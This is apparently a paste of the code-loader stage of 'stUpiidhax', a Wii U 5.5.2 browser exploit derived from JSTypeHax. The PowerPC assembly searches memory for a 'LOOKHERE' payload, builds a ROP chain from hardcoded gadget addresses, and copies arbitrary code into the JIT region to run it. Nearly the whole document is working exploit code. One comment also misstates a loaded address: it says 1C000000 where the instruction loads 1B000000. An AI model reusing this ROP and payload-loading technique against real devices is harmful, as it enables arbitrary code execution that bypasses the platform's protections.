stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

codeloader.s 4.1KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196
  1. # This is a program written in PPC to search address range 1C000000-1D000000
  2. # for the magic "LOOKHERE", then load the code based on the format
  3. #Format to load:
  4. # struct PAYLOAD{
  5. # char magic[8]; // "LOOKHERE"
  6. # uint32 size; // Size of code
  7. # byte code[size]; // Raw PPC to load
  8. # }
  9. #Set up register aliases to make the code more readable
  10. .set r0, 0
  11. .set r1, 1
  12. .set r2, 2
  13. .set r3, 3
  14. .set r4, 4
  15. .set r5, 5
  16. .set r6, 6
  17. .set r7, 7
  18. .set r8, 8
  19. .set r9, 9
  20. .set r10, 10
  21. .set r11, 11
  22. .set r12, 12
  23. .set r13, 13
  24. .set r14, 14
  25. .set r15, 15
  26. .set r16, 16
  27. .set r17, 17
  28. .set r18, 18
  29. .set r19, 19
  30. .set r20, 20
  31. .set r21, 21
  32. .set r22, 22
  33. .set r23, 23
  34. .set r24, 24
  35. .set r25, 25
  36. .set r26, 26
  37. .set r27, 27
  38. .set r28, 28
  39. .set r29, 29
  40. .set r30, 30
  41. .set r31, 31
  42. #load address range to search
  43. lis r7, 0x1B00 #r7 = 1C000000
  44. lis r8, 0x1D00 #r8 = 1D000000
  45. #Load "LOOK" in r9
  46. lis r9, 0x4C4F
  47. ori r9, r9, 0x4F4B
  48. #Load "HERE" in r10
  49. lis r10, 0x4845
  50. ori r10, r10, 0x5245
  51. loop_start:
  52. #Check if the first word at r7 is equal to "LOOK" (r9)
  53. lwz r11, 0(r7)
  54. cmpw r11, r9
  55. bne not_equal #If not, restart loop
  56. #Check if second word at r7 is equal to "HERE" (r10)
  57. lwz r11, 4(r7)
  58. cmpw r11, r10
  59. beq found #If so, exit the loop and load the code
  60. #If "LOOKHERE" is not located at r7
  61. not_equal:
  62. #Increment by one word
  63. addi r7, r7, 4
  64. cmpw r7, r8 #Check if the counter (r7) is out of search range
  65. bge not_found #If out of range, exit loop and kill program
  66. b loop_start #If still in range, restart loop
  67. found:
  68. #Setup r11 as payloadSize and r7 as payloadAddress
  69. lwz r11, 8(r7)
  70. addi r7, r7, 0xC
  71. #Set up ROP chain to copy our code to codegen (we can't be executing from JIT while copying to JIT)
  72. #See ropChainToAsm.py for in-order ROP chain
  73. li r10, 0x0000
  74. stw r10, 0x0(r1)
  75. stw r10, 0x8(r1)
  76. stw r10, 0xC(r1)
  77. stw r10, 0x10(r1)
  78. stw r10, 0x14(r1)
  79. stw r10, 0x18(r1)
  80. stw r10, 0x24(r1)
  81. stw r10, 0x28(r1)
  82. stw r10, 0x2C(r1)
  83. stw r10, 0x30(r1)
  84. stw r10, 0x38(r1)
  85. stw r10, 0x3C(r1)
  86. stw r10, 0x40(r1)
  87. stw r10, 0x44(r1)
  88. stw r10, 0x48(r1)
  89. stw r10, 0x50(r1)
  90. stw r10, 0x54(r1)
  91. stw r10, 0x58(r1)
  92. stw r10, 0x60(r1)
  93. stw r10, 0x70(r1)
  94. stw r10, 0x78(r1)
  95. stw r10, 0x80(r1)
  96. stw r10, 0x84(r1)
  97. stw r10, 0x88(r1)
  98. stw r10, 0x8C(r1)
  99. stw r10, 0x90(r1)
  100. stw r10, 0x98(r1)
  101. stw r10, 0x9C(r1)
  102. stw r10, 0xA0(r1)
  103. stw r10, 0xA4(r1)
  104. stw r10, 0xA8(r1)
  105. stw r10, 0xB8(r1)
  106. stw r10, 0xBC(r1)
  107. stw r10, 0xC0(r1)
  108. stw r10, 0xC8(r1)
  109. stw r10, 0xCC(r1)
  110. stw r10, 0xD0(r1)
  111. stw r10, 0xD4(r1)
  112. stw r10, 0xD8(r1)
  113. stw r10, 0xE0(r1)
  114. stw r10, 0xE4(r1)
  115. stw r10, 0xE8(r1)
  116. stw r10, 0xEC(r1)
  117. stw r10, 0xF0(r1)
  118. stw r10, 0x100(r1)
  119. stw r10, 0x108(r1)
  120. stw r10, 0x110(r1)
  121. stw r10, 0x114(r1)
  122. stw r10, 0x118(r1)
  123. stw r10, 0x11C(r1)
  124. stw r10, 0x120(r1)
  125. stw r10, 0x128(r1)
  126. stw r10, 0x12C(r1)
  127. stw r10, 0x130(r1)
  128. stw r10, 0x134(r1)
  129. stw r10, 0x138(r1)
  130. stw r10, 0x148(r1)
  131. stw r10, 0x150(r1)
  132. stw r10, 0x158(r1)
  133. li r10, 0x0001
  134. stw r10, 0xB4(r1)
  135. lis r10, 0x0102
  136. ori r10, r10, 0x04C8
  137. stw r10, 0x4(r1)
  138. stw r10, 0x4C(r1)
  139. stw r10, 0x94(r1)
  140. stw r10, 0xDC(r1)
  141. stw r10, 0x124(r1)
  142. lis r10, 0x0102
  143. ori r10, r10, 0x3F88
  144. stw r10, 0xF8(r1)
  145. lis r10, 0x0102
  146. ori r10, r10, 0x40B0
  147. stw r10, 0x140(r1)
  148. lis r10, 0x0103
  149. ori r10, r10, 0x5FC8
  150. stw r10, 0x68(r1)
  151. lis r10, 0x0103
  152. ori r10, r10, 0x76C0
  153. stw r10, 0x20(r1)
  154. stw r10, 0xB0(r1)
  155. lis r10, 0x0107
  156. ori r10, r10, 0xDD70
  157. stw r10, 0x1C(r1)
  158. stw r10, 0x64(r1)
  159. stw r10, 0xAC(r1)
  160. stw r10, 0xF4(r1)
  161. stw r10, 0x13C(r1)
  162. lis r10, 0x0108
  163. ori r10, r10, 0x0274
  164. stw r10, 0x34(r1)
  165. stw r10, 0x7C(r1)
  166. stw r10, 0xC4(r1)
  167. stw r10, 0x10C(r1)
  168. stw r10, 0x154(r1)
  169. lis r10, 0x0180
  170. stw r10, 0x6C(r1)
  171. stw r10, 0xFC(r1)
  172. stw r10, 0x144(r1)
  173. stw r10, 0x15C(r1)
  174. stw r7, 0x74(r1)
  175. stw r11, 0x5C(r1)
  176. stw r11, 0x104(r1)
  177. stw r11, 0x14C(r1)
  178. #Start ROP
  179. lwz r0, 0x4(r1)
  180. mtlr r0
  181. blr
  182. not_found:
  183. blr #RIP, no payload found